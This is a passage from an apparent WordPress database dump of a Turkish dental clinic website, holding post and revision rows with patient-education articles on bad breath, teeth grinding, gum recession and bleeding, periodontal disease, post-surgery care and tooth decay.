<li>Ağız gargaralarının kullanımı ağız kokusunun azalmasına yardımcı olacaktır.</li>\r\n 	<li>Eğer dişhekimi ağız temizliğinin yeterli olduğunu tespit ederse o zaman ağız dışı kaynaklar araştırılmalı ve konunun uzmanı ile görüşülmelidir.</li>\r\n</ul>\r\n<strong>Diş gıcırdatmanın sebebi nedir?</strong>\r\n\r\nDiş gıcırdatma; çiğneme refleksinin uyku sırasında aktif hale geçerek alt ve üst dişlerin birbirlerine teması ile ortaya çıkan istem dışı bir harekettir. Genellikle geceleri ortaya çıkmakla birlikte gündüzleri yaşanan kısa süreli uyumalarda da hafif şiddette kendini gösterebilir.\r\n\r\nDiş gıcırdatmanın sebebi tam olarak bilinmemekle birlikte hazırlayıcı bir takım etkenlerden söz edilebilir. Bunlar arasında ‘stres’ önemli yer tutmaktadır. Onun dışında sindirim problemleri, uyku bozuklukları, dişlerin kapanış problemleri, sistemik hastalıklar ve bazı ilaçların kullanımı da diş gıcırdatmaya zemin hazırlamaktadır.\r\n\r\n<strong>Diş gıcırdatmak hangi problemlere yol açar?</strong>\r\n\r\nHafif şiddetli diş gıcırdatma pek çok kişide herhangi bir sağlık sorununa yol açmaz. Ancak ileri seviyedeki gıcırdatmalarda alt çenenin yan hareketleri sonucu öncelikle kesici dişlerde aşınmalar meydana gelir. Azı dişlerinin de devreye girmesiyle daha da şiddetlenen bu hareket sırasında ciddi bir ses oluşur ve bu ses, diğer insanları rahatsız edici boyutlara ulaşabilir. Dişlerin mine yüzeylerinin aşınması zordur ancak aşınma alttaki daha yumuşak tabakaya ulaştığında hızlanarak devam eder ve çürüğe yatkınlık artar. Ayrıca bu hareket esnasında dişlerin kırılabilme olasılığı da vardır. Bazen bu duruma dişeti çekilmeleri de eşlik eder. İleri safhalarda dişlerde, soğuk, sıcak, ekşi, tatlı vb. hassasiyetinin başlaması kaçınılmaz olacaktır. Diş gıcırdatma sırasında dişler ve çenelere çok yüksek bir basınç iletilmektedir. Bundan dolayı uzun süren diş gıcırdatmaları; yüz ağrıları, boyun ağrıları, kulağa yansıyan ağrılar, baş ağrıları ve çene ekleminde rahatsızlıklara neden olabilir.\r\n\r\n<strong>Diş gıcırdatma sorunu nasıl tedavi edilir?</strong>\r\n\r\nÇoğu kişi herhangi bir belirti verene kadar diş gıcırdatma sorunu yaşadığının farkında değildir. Bu durum genellikle ağız ve diş muayenesi sırasında dişhekimi tarafından fark edilir.\r\n\r\nErken dönemde; diş yüzeylerinin aşınmasını engellemek için dişhekimi tarafından yapılan gece plakları etkili olabilir. Geç dönemde; dişlerde meydana gelen hasarların tedavisi yine dişhekimi tarafından yapılan koruyucu uygulamalar ile aşılabilir.\r\n\r\nAyrıca sebeplerin ortadan kaldırılması da tedavide etkin bir yöntemdir. Örneğin dişlerin kapanış bozuklukları farklı yöntemlerle normal hale getirilebilir. Nedeni tam olarak bilinemeyen bu tip durumlarda stres faktörünün azaltılmasının da faydası olacağı açıktır.[/vc_column_text][/vc_column][/vc_row]', 'Sık Karşılaşılan Sorunlar', '', 'publish', 'closed', 'closed', '', 'sik-karsilasilan-sorunlar', '', '', '2018-07-13 12:54:52', '2018-07-13 09:54:52', '', 0, 'http://www.ze-dent.com/?p=6247', 0, 'post', '', 0),
(6248, 1, '2018-07-13 12:54:44', '2018-07-13 09:54:44', '', 'sks', '', 'inherit', 'closed', 'closed', '', 'sks', '', '', '2018-07-13 12:54:44', '2018-07-13 09:54:44', '', 6247, 'http://www.ze-dent.com/wp-content/uploads/2018/07/sks.jpg', 0, 'attachment', 'image/jpeg', 0),
(6249, 1, '2018-07-13 12:54:52', '2018-07-13 09:54:52', '[vc_row][vc_column][vc_column_text]<strong>Ağız ve Diş Sağlığı / Sık Karşılaşılan Sorunlar\r\nDişeti çekilmelerinin nedenleri nelerdir?</strong>\r\n<ul>\r\n 	<li>Dişeti çekilmelerinin yaşlanmayla birlikte arttığı gözlenmektedir. Buna ‘fizyolojik dişeti çekilmesi’ denir.</li>\r\n 	<li>Dişlerin normal diş dizisinin dışında yer almaları ve üst ön dişlerin kesici kenarlarının alt ön dişlerin ön yüzeylerindeki dişetine mekanik baskı yapması sonucu dişeti çekilmeleri gözlenebilir.</li>\r\n 	<li>Dişlerin fırçalanması sonucunda dişetlerine sürekli olarak aşırı baskı uygulanması, dişeti çekilmesine neden olur. Böyle hastalarda hastanın ön diş yüzeylerinde bakteriyel plağa rastlanmaz ve çekilme olan bölgelerde dişlerin ön yüzeylerinde aşınmalar görülür.</li>\r\n 	<li>Uygulanan tedavi tekniğine bağlı olarak değişen yüzeylerde dişeti çekilmesi gözlenebilir.</li>\r\n 	<li>Dişler arasına kürdan veya toplu iğne gibi yabancı cisimlerin sürekli olarak sokulması, ilgili bölgedeki dişetinin kök ucuna doğru çekilmesine neden olabilir. Ayrıca bazı bireylerde görülen ve psikosomatik faktörlere bağlanan sebeplerle dişetinin tırnakla kök ucu yönünde itilmesi olayı da dişeti çekilmesine neden olabilir.</li>\r\n 	<li>Diş köklerinin aşırı dış bükey olması dişeti çekilmesinin meydana gelmesini kolaylaştırabilir.</li>\r\n</ul>\r\n<strong>Dişeti çekilmesi nasıl tedavi edilir?</strong>\r\n\r\nBazen basit diş eti çekilmesi sorunu, diş taşı temizliği ile giderilebilir. Ancak ciddi çekilmelerde kendi kendine sağlıklı haline dönmesi mümkün değildir. Öncelikle ilk aşamadaki tedaviler uygulanır, gerekliyse cerrahiye geçilir ve yumuşak doku greftleri kullanılabilir. Bu nedenle dişhekimine başvurup anemnez(sorgulama) sonrası muayene neticesi tedavi şekline karar verilir.\r\n\r\n<strong>Dişeti kanamasının nedenleri nelerdir?</strong>\r\n\r\nDiş etleri kanıyorsa, kanamanın bulunduğu bölgede iltihap var demektir. Bu ‘mikrobiyal dental plak’ denilen diş taşı hastalıklarının nedenlerinden ya da kötü bir dolgu veya kötü bir kronun travmatik etkenlerinden kaynaklanabilir. Sert bir cisim çarpması sonucu da kanamalar oluşabilir ama bunlar geçici diş eti kanamasıdır. Genetik faktörlerin de diş eti kanaması üzerinde etkisi vardır. Ancak birincil faktör her zaman ‘mikrobiyal dental plak’tır, genetik faktörler çoğu zaman bunu destekler. Genetik faktörlerin etkiliği olan bireyde hastalık daha yavaş ilerler, daha uzun sürede daha az tahribat yapar.\r\n\r\n<strong>Dişeti kanaması nasıl tedavi edilir?</strong>\r\n\r\nHastalık, alt taraftaki kemiğe doğru ilerlememişse yani sadece diş etinde ise iyi bir bakım ve ağız hijyeni ile sorun çözülür. Eğer dişetinin altındaki dokulara ulaşmışsa, ortalama hastalığın boyutu 2-3 mm’yi aşmıştır ve diş fırçası ile bu mesafede bir temizlik yapmak mümkün değildir. Bunun için bir dişhekimi vasıtasıyla bu bölgelerin temizlenmesi, tahrip olan dokuların düzeltilmesi, hastalıklı olan dokuların sağlıklı hale getirilmesi gerekir. Her şey kontrol altına alındıktan sonra ise bunun korunması gerekir.\r\n\r\n<strong>Ağız kokusunun nedenleri nelerdir?</strong>\r\n<ul>\r\n 	<li>Diş aralarında, dil üzerinde ve diğer çevre dokularda kalan yiyecek artıkları, ağız içindeki bakteriler aracılığı ile kötü kokulu bileşiklerin oluşmasına sebep olmaktadır.</li>\r\n 	<li>Ağız bakımı eksikliğine bağlı olarak gelişen diş çürükleri ve dişeti hastalıkları tabloyu ağırlaştırmaktadır.</li>\r\n 	<li>İyi temizlenmeyen protezler de benzer şekilde ağız kokusunun daha şiddetli hissedilmesine neden olmaktadır.</li>\r\n 	<li>Bazı ilaçların sürekli kullanımında, tükürük bezleri ile ilgili hastalıklarda veya sürekli ağız solunumu yapan kişilerde, tükürük azlığına bağlı olarak ağız kokusu gelişebilir.</li>\r\n 	<li>Tükettiğimiz bazı yiyecekler (soğan, sarımsak, et, balık, peynir vb.) nefesimizin kötü kokmasına neden olabilir. (Dişlerin ve dilin temizlenmesi ile bu koku ortadan kalkmaz. Kokuya neden olan yiyecek vücuttan bütünüyle atılana dek koku devam edecektir.)</li>\r\n 	<li>Benzer şekilde tütün ürünleri ve alkol de ağız kokusuna neden olurlar.</li>\r\n 	<li>Ağız kokusunun ortaya çıkmasında az da olsa bazı hastalıklar rol almaktadır. Bunlar arasında; şeker hastalığı, alt ve üst solunum yolları enfeksiyonları, sindirim sistemi bozuklukları, karaciğer ve böbrek hastalıkları sayılabilir. (Bunların ağızda oluşturdukları koku ağız içinde bakterilerin neden olduğu kokular gibi olmayabilir. Örneğin, şeker hastalarında ağızdan gelen aseton kokusu söz konusudur.)</li>\r\n</ul>\r\n<strong>Ağız kokusu nasıl giderilir?</strong>\r\n<ul>\r\n 	<li>Ağız içinde çürük dişler, kanayan dişetleri, iyi temizlenmemiş protezler varsa gerekli tedaviler yapılmalıdır.</li>\r\n 	<li>Diş ve dişetleri sağlıklı hale getirildikten sonra bu durumun korunması için düzenli olarak diş fırçası ve diş ipi kullanılmalıdır</li>\r\n 	<li>Ayrıca dilin üzeri de mutlaka fırçalanmalıdır. Bu iş için özel olarak üretilmiş dil fırçalarının kullanılması daha uygundur.</li>\r\n 	<li>Şekersiz sakız çiğneyerek tükürük akışını artırmak, gıda artıklarının temizliğine katkıda bulunacaktır.</li>\r\n 	<li>Ağız gargaralarının kullanımı ağız kokusunun azalmasına yardımcı olacaktır.</li>\r\n 	<li>Eğer dişhekimi ağız temizliğinin yeterli olduğunu tespit ederse o zaman ağız dışı kaynaklar araştırılmalı ve konunun uzmanı ile görüşülmelidir.</li>\r\n</ul>\r\n<strong>Diş gıcırdatmanın sebebi nedir?</strong>\r\n\r\nDiş gıcırdatma; çiğneme refleksinin uyku sırasında aktif hale geçerek alt ve üst dişlerin birbirlerine teması ile ortaya çıkan istem dışı bir harekettir. Genellikle geceleri ortaya çıkmakla birlikte gündüzleri yaşanan kısa süreli uyumalarda da hafif şiddette kendini gösterebilir.\r\n\r\nDiş gıcırdatmanın sebebi tam olarak bilinmemekle birlikte hazırlayıcı bir takım etkenlerden söz edilebilir. Bunlar arasında ‘stres’ önemli yer tutmaktadır. Onun dışında sindirim problemleri, uyku bozuklukları, dişlerin kapanış problemleri, sistemik hastalıklar ve bazı ilaçların kullanımı da diş gıcırdatmaya zemin hazırlamaktadır.\r\n\r\n<strong>Diş gıcırdatmak hangi problemlere yol açar?</strong>\r\n\r\nHafif şiddetli diş gıcırdatma pek çok kişide herhangi bir sağlık sorununa yol açmaz. Ancak ileri seviyedeki gıcırdatmalarda alt çenenin yan hareketleri sonucu öncelikle kesici dişlerde aşınmalar meydana gelir. Azı dişlerinin de devreye girmesiyle daha da şiddetlenen bu hareket sırasında ciddi bir ses oluşur ve bu ses, diğer insanları rahatsız edici boyutlara ulaşabilir. Dişlerin mine yüzeylerinin aşınması zordur ancak aşınma alttaki daha yumuşak tabakaya ulaştığında hızlanarak devam eder ve çürüğe yatkınlık artar. Ayrıca bu hareket esnasında dişlerin kırılabilme olasılığı da vardır. Bazen bu duruma dişeti çekilmeleri de eşlik eder. İleri safhalarda dişlerde, soğuk, sıcak, ekşi, tatlı vb. hassasiyetinin başlaması kaçınılmaz olacaktır. Diş gıcırdatma sırasında dişler ve çenelere çok yüksek bir basınç iletilmektedir. Bundan dolayı uzun süren diş gıcırdatmaları; yüz ağrıları, boyun ağrıları, kulağa yansıyan ağrılar, baş ağrıları ve çene ekleminde rahatsızlıklara neden olabilir.\r\n\r\n<strong>Diş gıcırdatma sorunu nasıl tedavi edilir?</strong>\r\n\r\nÇoğu kişi herhangi bir belirti verene kadar diş gıcırdatma sorunu yaşadığının farkında değildir. Bu durum genellikle ağız ve diş muayenesi sırasında dişhekimi tarafından fark edilir.\r\n\r\nErken dönemde; diş yüzeylerinin aşınmasını engellemek için dişhekimi tarafından yapılan gece plakları etkili olabilir. Geç dönemde; dişlerde meydana gelen hasarların tedavisi yine dişhekimi tarafından yapılan koruyucu uygulamalar ile aşılabilir.\r\n\r\nAyrıca sebeplerin ortadan kaldırılması da tedavide etkin bir yöntemdir. Örneğin dişlerin kapanış bozuklukları farklı yöntemlerle normal hale getirilebilir. Nedeni tam olarak bilinemeyen bu tip durumlarda stres faktörünün azaltılmasının da faydası olacağı açıktır.[/vc_column_text][/vc_column][/vc_row]', 'Sık Karşılaşılan Sorunlar', '', 'inherit', 'closed', 'closed', '', '6247-revision-v1', '', '', '2018-07-13 12:54:52', '2018-07-13 09:54:52', '', 6247, 'http://www.ze-dent.com/6247-revision-v1/', 0, 'revision', '', 0),
(6250, 1, '2018-07-13 13:03:43', '2018-07-13 10:03:43', '[vc_row][vc_column][vc_column_text]<strong>Diş eti hastalıklarının sebepleri nelerdir?</strong>\r\nDişeti hastalıklarının temel nedeni bakteri plağı denilen ve dişe sıkıca tutunan, yapışkan saydam bir tabakadır. Plağın bir miligramında 200 ile 500 milyon arasında bakteri bulunur. Bunun yanı sıra aşağıdaki faktörler de dişeti sağlığını ciddi anlamda etkilemektedir:\r\n<ul>\r\n 	<li>Genetik faktörler,</li>\r\n 	<li>Sigara,</li>\r\n 	<li>İlaç kullanımı (doğum kontrol hapları, antidepresanlar, kalp ilaçları vb.),</li>\r\n 	<li>Hormonal değişiklikler (hamilelik, menapoz, mensturasyon vb.)</li>\r\n 	<li>Stres,</li>\r\n 	<li>Diş sıkmak ve gıcırdatmak,</li>\r\n 	<li>Dengesiz beslenme,</li>\r\n 	<li>Diabet-şeker hastalığı,</li>\r\n 	<li>Kötü yapılmış ağız içi işlemler (kuron, köprü ve dolgular)</li>\r\n</ul>\r\n<strong>Dişeti hastalıklarının belirtileri nasıl görülür?</strong>\r\n\r\nErişkinlerde diş kayıplarının %70`inden periodontal hastalıklar sorumludur. Bu hastalıklar erken dönemde teşhis edildiklerinde kolay ve başarılı bir şekilde tedavi edilebilirler. Dişeti hastalıklarının önlenmesi veya tedavisi; doğal dişlerin korunması, daha rahat çiğnemenin ve daha iyi bir sindirimin sağlanması gibi diğer faydaları da beraberinde getirir.\r\n\r\n<strong>Diş eti hastalığının pek çok bulgusu vardır:</strong>\r\n<ul>\r\n 	<li>Diş fırçalama sırasında kanayan diş etleri,</li>\r\n 	<li>Kırmızı, şiş ve hassas diş etleri,</li>\r\n 	<li>Dişlerden kolaylıkla ayrılabilen, uzaklaşan diş etleri,</li>\r\n 	<li>Dişler ve diş etleri arasında iltihabi akıntı,</li>\r\n 	<li>Sallanan veya giderek birbirinden uzaklaşan dişler (dişler arasında aralıkların oluşması veya mevcut aralıkların artması),</li>\r\n 	<li>Diş eti kenarlarında veya dişler arasında, diş taşlarına bağlı olarak oluşan siyah alanlar,</li>\r\n 	<li>Isırma sırasında alt ve üst dişler arasındaki ilişkilerin değişmesi,</li>\r\n 	<li>Bölümlü protez uyumundaki değişiklik, bozulma,</li>\r\n 	<li>Sürekli ağız kokusu ve kötü bir tat hissi.</li>\r\n</ul>\r\n<strong>Diş taşı temizliğinin dişeti hastalıklarını önlemedeki etkisi nedir?</strong>\r\n\r\nPeriodontal hastalıklar diş eti iltihabı ile başlar ve bunun en önemli etkeni diş plağıdır. Diş plağının kalsifiye olması ile diş taşı oluşur. Diş taşı pürüzlü bir yüzeye sahiptir ve üzeri daima kalsifiye olmamış plak ile örtülüdür. Böylece diş taşı, plak için uygun bir yuva oluşturarak iltihabın sürmesine ve şiddetlenmesine neden olur. Diş eti rahatsızlıklarına neden olan bu bakteri plağının, diş fırçalaması ve diş ipi kullanılması ve kimyasal ajanlarla düzenli olarak her gün, dişlerden uzaklaştırılması gerekmektedir. Günlük ağız bakımı diş taşlarının oluşumunu en az seviyede tutmakla beraber tamamen önleyememektedir. Bu nedenle oluşmuş diş taşları mutlaka temizletilmelidir. Bu dişlere zarar verebilecek veya tehlikeli bir işlem değildir. Diş taşının yeniden oluşumu etkin bir ağız bakımı ile engellenebilir.\r\n\r\nDiştaşı temizliği yapıldıktan sonra dişlerde hassasiyet ve bir miktar kanama olabilir, bu durum normaldir. Diş taşı temizliği sonrası yüzey açığa çıkar ve açığa çıkan bu yüzeyde soğuk ve sıcağa karşı duyarlılık oluşur. Bu duyarlılığın 3-4 günde geçmesi beklenir.\r\n\r\n<strong>Dişetlerine yapılan cerrahi müdahale sonrası neler yapılmalıdır?</strong>\r\n\r\nDişeti rahatsızlıklarının ilerlemiş vakalarında cerrahi müdahale gerekebilir. Cerrahi müdahalenin amacı; derin ceplerdeki diştaşlarını ve hastalıklı dokuları ortamda uzaklaştırarak iyileşmenin olabilmesi için kök yüzeylerini düzleştirmek ve diş etlerine kolay temizlenebilmesi için şekil vermektir. Bu cerrahi müdahaleler ertesinde dikkat edilmesi gerekenler şunlardır:\r\n<ul>\r\n 	<li>Cerrahi işlem sonrasında 2 saat hiçbir şey yiyip içmeyiniz.</li>\r\n 	<li>İlk 24 saat içerisinde sıcak yiyecek ve içeceklerden uzak durmanız gerekmektedir. Çiğneme operasyona dahil edilmeyen bölge ile yapılmalıdır. Yumuşak ve ılık yiyecekler uygundur. Asitli meyve suları, alkollü içecekler ve baharatlı yiyeceklerden uzak durulması gerekmektedir. Aksi takdirde ağrıya neden olurlar.</li>\r\n 	<li>Ameliyatı takip eden günlerde sigara içilmemelidir. Diş etini irrite ederek iyileşmeyi tehlikeye atacağından ve ağız içi sıcaklığını arttıracağından cerrahi işlem sonrası sigara içilmemesi gerekir.</li>\r\n 	<li>Ameliyatı takiben 2 hafta süresince, eğer varsa, protezlerin mümkün olduğunca az kullanılması gerekmektedir.</li>\r\n 	<li>Ameliyat yapılan bölgede pat yoksa veya düştüğünde süturlara bakmak için dudak ve yanağın kaldırılmaması gerekmektedir.</li>\r\n 	<li>Ameliyat bölgesine konulan pat sizi rahat ettirmek ve yara bölgesini irritasyondan korumak içindir. Ağrıyı önler, yara iyileşmesini kolaylaştırır ve alışık olduğunuz aktiviteleri rahatlıkla sürdürebilmenizi sağlar. Pat ilk yerleştirildiği birkaç saat içinde rahatsızlık hissi verebilir. Dil veya parmakla patı oynatmayınız. Yerleştirilen pat küçük parçalar halinde kırılırsa panik yapmayınız. Büyük parçalar koparsa veya sizi çok rahatsız ederse doktorunuzu arayınız.</li>\r\n 	<li>Hafif şişlikler olabilir. Operasyon bölgesinin üzerine ilk gün buz torbası hazırlayarak dışarıdan uygulayabilirsiniz. Sık olarak bir çay kaşığı tuz koyduğunuz bir bardak ılık su ile ağzınızı yavaşça çalkalayınız.</li>\r\n 	<li>Operasyon sonrası ilk 4-5 saat içerisinde cerrahi bölgesinden bir miktar sızıntı olabilir. Bu da tükürüğünüze kırmızı renk verecektir. Bu durumda panik yapmayınız ve sızıntı devam ederse temiz bir gazlı bezi rulo haline getirip 20 dakika kadar kanama bölgesine bası yapacak şekilde uygulayabilirsiniz. Daha uzun süreli kanamalar doktorunuz tarafından kontrol altına alınmalıdır.</li>\r\n 	<li>Operasyon sonrası ilk 24 saat içerisinde ürperti ve halsizlik hissi oluşabilir. Bu durum normaldir ve endişeye gerek yoktur. Günlük aktivitelerinize devam edebilirsiniz, ancak aşırı çaba gerektiren sporlar yapılmamalıdır.</li>\r\n 	<li>Ameliyat sonrası iyileşme için doktorunuzun yazdığı reçeteyi uygulayınız. Eğer doktorunuz önermişse antibiyotikleri tarif edilen şekilde kullanınız. Ameliyat sonrası ağrınız olursa ağrı kesici alabilirsiniz. Bu durumda aspirin veya benzeri salisilik asit türevi ilaçlar alınmamalıdır.</li>\r\n 	<li>Ameliyat edilmeyen bölgelere normal fırçalama işlemlerini uygulayabilirsiniz. Ameliyat bölgesindeki dişlerin ise çiğneme yüzeylerini fırçalayınız. Pat uygulanmamışsa o bölgedeki dişleri de fırçalayabilirsiniz. Ancak, diş ipi kullanırken diş eti altına inmeyiniz. Doktorunuz önermişse fırçalama işlemleri sonrası önerilen ağız gargarasını kullanabilirsiniz.</li>\r\n 	<li>Yemek sonrası ağzınızı çalkalayın. Patın üzerini nemli pamukla veya kulak temizleme çubuğu ile silebilirsiniz.</li>\r\n 	<li>Doktorunuzun önerdiği süre (1 hafta veya 10 gün) sonunda dikişlerinizi aldırmak ve kontrol için doktorunuzu arayınız.</li>\r\n</ul>\r\n[/vc_column_text][/vc_column][/vc_row]', 'Dişeti Hastalıkları', '', 'publish', 'closed', 'closed', '', 'diseti-hastaliklari', '', '', '2018-07-18 20:45:39', '2018-07-18 17:45:39', '', 0, 'http://www.ze-dent.com/?p=6250', 0, 'post', '', 0),
(6251, 1, '2018-07-13 13:03:34', '2018-07-13 10:03:34', '', 'diseti-rahatsizliklari', '', 'inherit', 'closed', 'closed', '', 'diseti-rahatsizliklari', '', '', '2018-07-13 13:03:34', '2018-07-13 10:03:34', '', 6250, 'http://www.ze-dent.com/wp-content/uploads/2018/07/diseti-rahatsizliklari.jpg', 0, 'attachment', 'image/jpeg', 0),
(6252, 1, '2018-07-13 13:03:43', '2018-07-13 10:03:43', '[vc_row][vc_column][vc_column_text]<strong>Diş eti hastalıklarının sebepleri nelerdir?</strong>\r\nDişeti hastalıklarının temel nedeni bakteri plağı denilen ve dişe sıkıca tutunan, yapışkan saydam bir tabakadır. Plağın bir miligramında 200 ile 500 milyon arasında bakteri bulunur. Bunun yanı sıra aşağıdaki faktörler de dişeti sağlığını ciddi anlamda etkilemektedir:\r\n<ul>\r\n 	<li>Genetik faktörler,</li>\r\n 	<li>Sigara,</li>\r\n 	<li>İlaç kullanımı (doğum kontrol hapları, antidepresanlar, kalp ilaçları vb.),</li>\r\n 	<li>Hormonal değişiklikler (hamilelik, menapoz, mensturasyon vb.)</li>\r\n 	<li>Stres,</li>\r\n 	<li>Diş sıkmak ve gıcırdatmak,</li>\r\n 	<li>Dengesiz beslenme,</li>\r\n 	<li>Diabet-şeker hastalığı,</li>\r\n 	<li>Kötü yapılmış ağız içi işlemler (kuron, köprü ve dolgular)</li>\r\n</ul>\r\n<strong>Dişeti hastalıklarının belirtileri nasıl görülür?</strong>\r\n\r\nErişkinlerde diş kayıplarının %70`inden periodontal hastalıklar sorumludur. Bu hastalıklar erken dönemde teşhis edildiklerinde kolay ve başarılı bir şekilde tedavi edilebilirler. Dişeti hastalıklarının önlenmesi veya tedavisi; doğal dişlerin korunması, daha rahat çiğnemenin ve daha iyi bir sindirimin sağlanması gibi diğer faydaları da beraberinde getirir.\r\n\r\n<strong>Diş eti hastalığının pek çok bulgusu vardır:</strong>\r\n<ul>\r\n 	<li>Diş fırçalama sırasında kanayan diş etleri,</li>\r\n 	<li>Kırmızı, şiş ve hassas diş etleri,</li>\r\n 	<li>Dişlerden kolaylıkla ayrılabilen, uzaklaşan diş etleri,</li>\r\n 	<li>Dişler ve diş etleri arasında iltihabi akıntı,</li>\r\n 	<li>Sallanan veya giderek birbirinden uzaklaşan dişler (dişler arasında aralıkların oluşması veya mevcut aralıkların artması),</li>\r\n 	<li>Diş eti kenarlarında veya dişler arasında, diş taşlarına bağlı olarak oluşan siyah alanlar,</li>\r\n 	<li>Isırma sırasında alt ve üst dişler arasındaki ilişkilerin değişmesi,</li>\r\n 	<li>Bölümlü protez uyumundaki değişiklik, bozulma,</li>\r\n 	<li>Sürekli ağız kokusu ve kötü bir tat hissi.</li>\r\n</ul>\r\n<strong>Diş taşı temizliğinin dişeti hastalıklarını önlemedeki etkisi nedir?</strong>\r\n\r\nPeriodontal hastalıklar diş eti iltihabı ile başlar ve bunun en önemli etkeni diş plağıdır. Diş plağının kalsifiye olması ile diş taşı oluşur. Diş taşı pürüzlü bir yüzeye sahiptir ve üzeri daima kalsifiye olmamış plak ile örtülüdür. Böylece diş taşı, plak için uygun bir yuva oluşturarak iltihabın sürmesine ve şiddetlenmesine neden olur. Diş eti rahatsızlıklarına neden olan bu bakteri plağının, diş fırçalaması ve diş ipi kullanılması ve kimyasal ajanlarla düzenli olarak her gün, dişlerden uzaklaştırılması gerekmektedir. Günlük ağız bakımı diş taşlarının oluşumunu en az seviyede tutmakla beraber tamamen önleyememektedir. Bu nedenle oluşmuş diş taşları mutlaka temizletilmelidir. Bu dişlere zarar verebilecek veya tehlikeli bir işlem değildir. Diş taşının yeniden oluşumu etkin bir ağız bakımı ile engellenebilir.\r\n\r\nDiştaşı temizliği yapıldıktan sonra dişlerde hassasiyet ve bir miktar kanama olabilir, bu durum normaldir. Diş taşı temizliği sonrası yüzey açığa çıkar ve açığa çıkan bu yüzeyde soğuk ve sıcağa karşı duyarlılık oluşur. Bu duyarlılığın 3-4 günde geçmesi beklenir.\r\n\r\n<strong>Dişetlerine yapılan cerrahi müdahale sonrası neler yapılmalıdır?</strong>\r\n\r\nDişeti rahatsızlıklarının ilerlemiş vakalarında cerrahi müdahale gerekebilir. Cerrahi müdahalenin amacı; derin ceplerdeki diştaşlarını ve hastalıklı dokuları ortamda uzaklaştırarak iyileşmenin olabilmesi için kök yüzeylerini düzleştirmek ve diş etlerine kolay temizlenebilmesi için şekil vermektir. Bu cerrahi müdahaleler ertesinde dikkat edilmesi gerekenler şunlardır:\r\n<ul>\r\n 	<li>Cerrahi işlem sonrasında 2 saat hiçbir şey yiyip içmeyiniz.</li>\r\n 	<li>İlk 24 saat içerisinde sıcak yiyecek ve içeceklerden uzak durmanız gerekmektedir. Çiğneme operasyona dahil edilmeyen bölge ile yapılmalıdır. Yumuşak ve ılık yiyecekler uygundur. Asitli meyve suları, alkollü içecekler ve baharatlı yiyeceklerden uzak durulması gerekmektedir. Aksi takdirde ağrıya neden olurlar.</li>\r\n 	<li>Ameliyatı takip eden günlerde sigara içilmemelidir. Diş etini irrite ederek iyileşmeyi tehlikeye atacağından ve ağız içi sıcaklığını arttıracağından cerrahi işlem sonrası sigara içilmemesi gerekir.</li>\r\n 	<li>Ameliyatı takiben 2 hafta süresince, eğer varsa, protezlerin mümkün olduğunca az kullanılması gerekmektedir.</li>\r\n 	<li>Ameliyat yapılan bölgede pat yoksa veya düştüğünde süturlara bakmak için dudak ve yanağın kaldırılmaması gerekmektedir.</li>\r\n 	<li>Ameliyat bölgesine konulan pat sizi rahat ettirmek ve yara bölgesini irritasyondan korumak içindir. Ağrıyı önler, yara iyileşmesini kolaylaştırır ve alışık olduğunuz aktiviteleri rahatlıkla sürdürebilmenizi sağlar. Pat ilk yerleştirildiği birkaç saat içinde rahatsızlık hissi verebilir. Dil veya parmakla patı oynatmayınız. Yerleştirilen pat küçük parçalar halinde kırılırsa panik yapmayınız. Büyük parçalar koparsa veya sizi çok rahatsız ederse doktorunuzu arayınız.</li>\r\n 	<li>Hafif şişlikler olabilir. Operasyon bölgesinin üzerine ilk gün buz torbası hazırlayarak dışarıdan uygulayabilirsiniz. Sık olarak bir çay kaşığı tuz koyduğunuz bir bardak ılık su ile ağzınızı yavaşça çalkalayınız.</li>\r\n 	<li>Operasyon sonrası ilk 4-5 saat içerisinde cerrahi bölgesinden bir miktar sızıntı olabilir. Bu da tükürüğünüze kırmızı renk verecektir. Bu durumda panik yapmayınız ve sızıntı devam ederse temiz bir gazlı bezi rulo haline getirip 20 dakika kadar kanama bölgesine bası yapacak şekilde uygulayabilirsiniz. Daha uzun süreli kanamalar doktorunuz tarafından kontrol altına alınmalıdır.</li>\r\n 	<li>Operasyon sonrası ilk 24 saat içerisinde ürperti ve halsizlik hissi oluşabilir. Bu durum normaldir ve endişeye gerek yoktur. Günlük aktivitelerinize devam edebilirsiniz, ancak aşırı çaba gerektiren sporlar yapılmamalıdır.</li>\r\n 	<li>Ameliyat sonrası iyileşme için doktorunuzun yazdığı reçeteyi uygulayınız. Eğer doktorunuz önermişse antibiyotikleri tarif edilen şekilde kullanınız. Ameliyat sonrası ağrınız olursa ağrı kesici alabilirsiniz. Bu durumda aspirin veya benzeri salisilik asit türevi ilaçlar alınmamalıdır.</li>\r\n 	<li>Ameliyat edilmeyen bölgelere normal fırçalama işlemlerini uygulayabilirsiniz. Ameliyat bölgesindeki dişlerin ise çiğneme yüzeylerini fırçalayınız. Pat uygulanmamışsa o bölgedeki dişleri de fırçalayabilirsiniz. Ancak, diş ipi kullanırken diş eti altına inmeyiniz. Doktorunuz önermişse fırçalama işlemleri sonrası önerilen ağız gargarasını kullanabilirsiniz.</li>\r\n 	<li>Yemek sonrası ağzınızı çalkalayın. Patın üzerini nemli pamukla veya kulak temizleme çubuğu ile silebilirsiniz.</li>\r\n 	<li>Doktorunuzun önerdiği süre (1 hafta veya 10 gün) sonunda dikişlerinizi aldırmak ve kontrol için doktorunuzu arayınız.</li>\r\n</ul>\r\n[/vc_column_text][/vc_column][/vc_row]', 'Dişeti Hastalıkları (Periodontal)', '', 'inherit', 'closed', 'closed', '', '6250-revision-v1', '', '', '2018-07-13 13:03:43', '2018-07-13 10:03:43', '', 6250, 'http://www.ze-dent.com/6250-revision-v1/', 0, 'revision', '', 0),
(6254, 1, '2018-07-13 13:18:25', '2018-07-13 10:18:25', '[vc_row][vc_column][vc_column_text]<strong>Dişler neden çürür?</strong>\r\n\r\nAğızda bulunan bakterilerden oluşan bakteri plağı, şekerli ve unlu yiyeceklerin ağızda kalan artıklarından asit oluşturabilmektedir. Bu asitler, dişlerin mineral dokusunu çözerek dişin minesinin bozulmasına ve sonuçta da diş çürüğünün başlamasına ve diş hekimlerinin \"kavite\" dedikleri oyuklara neden olmaktadırlar. Bunlar daha çok koyu renklenmelerle birlikte görülen oyuklardır.\r\n\r\nŞekerli ve unlu yiyeceklerle bakterilerin buluşması sonucunda çürükler oluştuğuna göre herkes için bir tehlike var demektir. Ancak beslenmelerinde karbonhidratlı ve şekerli yiyeceklerin oranı çok yüksek olanlar bir de sularında florür oranı çok düşükse çok daha fazla çürük tehlikesi altındadırlar. Bakteri plağı tarafından oluşturulan aside karşı tükürük doğal bir savunma mekanizması oluştursa da tek başına çürüğü önleyemez. Tükürük akışını ve miktarını azaltan hastalıklar ya da ilaçlar da çürük oluşumunu hızlandırmaktadırlar. Bu nedenle de 